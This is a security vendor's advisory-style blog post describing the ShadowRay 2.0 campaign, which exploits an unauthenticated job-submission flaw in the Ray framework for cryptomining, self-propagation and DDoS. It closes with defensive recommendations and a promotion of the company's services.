A critical security campaign called ShadowRay 2.0 is turning exposed AI infrastructure into a crypto-mining nightmare. Attackers are exploiting a long-known, but persistently unpatched, vulnerability in the open-source Ray framework, weaponizing AI clusters especially those with NVIDIAGPUs for self-replicating cryptojacking and broader malicious activity.
What Is ShadowRay 2.0
- The root issue is CVE-2023–48022, a high-severity bug (CVSS 9.8) in Ray that allows unauthenticated remote code execution through its Job Submission API.
- This campaign tracked by Oligo Security abuses misconfigured Ray dashboards and job APIs alongside that vulnerability to hijack clusters.
- Once inside, attackers submit malicious jobs written in Bash or Python. These payloads can do reconnaissance, maintain persistence, and even spread to other vulnerable Ray clusters.
- The attackers are not just running miners. They have turned Ray’s orchestration into a self-propagating botnet, using its native scheduling to spread laterally.
How the Botnet Works
- Cryptomining: Compromised clusters run XMRig to mine cryptocurrency, quietly stealing GPU cycles.
- Stealth Mode: To stay under the radar, the malware limits CPU usage (around 60 percent) and disguises miner processes as legitimate Linux services.
- Persistence: The code sets up cron jobs that re-pull malicious payloads every 15 minutes from attacker-controlled repositories (initially on GitLab, later on GitHub).
- Resource Competition: The malware even hunts down other cryptominers on the same host, killing them to maximize its own profit.
- Lateral Spread: The worm-like nature of the campaign means that compromised clusters are used to find and infect more Ray instances.
- DDoS Capability: In some cases, compromised clusters are repurposed to run denial-of-service attacks using tools like sockstress, suggesting a monetization model beyond just cryptomining.
Why This Is a Critical Threat
- Exposed Attack Surface: According to Oligo, more than 230,000 Ray servers are publicly reachable, making the scale of the risk enormous.
- Design Trade-Off: Ray developers originally designed the framework to run in trusted, private networks not exposed to the internet. That assumption is being abused.
- AI Resource Theft: High-performance GPU clusters, often rented at great cost, are being hijacked. These are precisely the systems AI firms and research labs depend on.
- Supply-Chain Risk: Attackers use publicly available DevOps infrastructure (GitLab and GitHub) to host and deploy their malware, making take-down efforts difficult.
- Evasion Strategy: By masking the malicious tasks and using orchestration features, the attackers avoid detection and create resilient, self-updating operations.
Recommended Defenses
To protect AI workloads and Ray-based clusters, security and IT teams should:
- Audit your Ray deployments and ensure no dashboards or job APIs are exposed to the internet.
- Use firewall rules to restrict access to Ray’s dashboard port (default 8265) from untrusted networks.
- Add authentication or an authorization layer on the Ray dashboard to prevent unauthenticated job submissions.
- Use Anyscale’s Ray Open Ports Checker to validate that your configuration aligns with security best practices.
- Monitor for abnormal job submissions, unusual cron jobs, or processes that mimic kernel services.
- Periodically scan nodes for cryptomining software (such as XMRig) or other indicators of compromise.
- Consider isolating Ray clusters in private networks whenever possible, limiting blast radius if a breach does occur.
Conclusion
ShadowRay 2.0 marks a new chapter in cybercrime: using AI infrastructure to fuel cybercriminal botnets. The combination of unprotected orchestration APIs, exposed compute power, and stealthy malware strategies makes this a particularly dangerous campaign. As organizations scale up their AI operations, securing the underlying infrastructure must be a top priority not just for performance, but for foundational security.
About COE Security
At COE Security, we support forward-looking organizations in AI startups, research labs, cloud-native businesses, enterprise technology, and data-driven companies. We help by:
- Assessing and securing AI infrastructure and Ray clusters
- Designing hardened deployment practices with least-privilege access and network segmentation
- Building runtime monitoring and threat detection tailored to AI workloads
- Aligning security practices with compliance frameworks like ISO 27001, SOC 2, GDPR, HIPAA, and PCI DSS
- Offering incident response planning that includes emerging risks such as cryptojacking and worm-style propagation
To stay updated and cyber safe, follow COE Security on LinkedIn.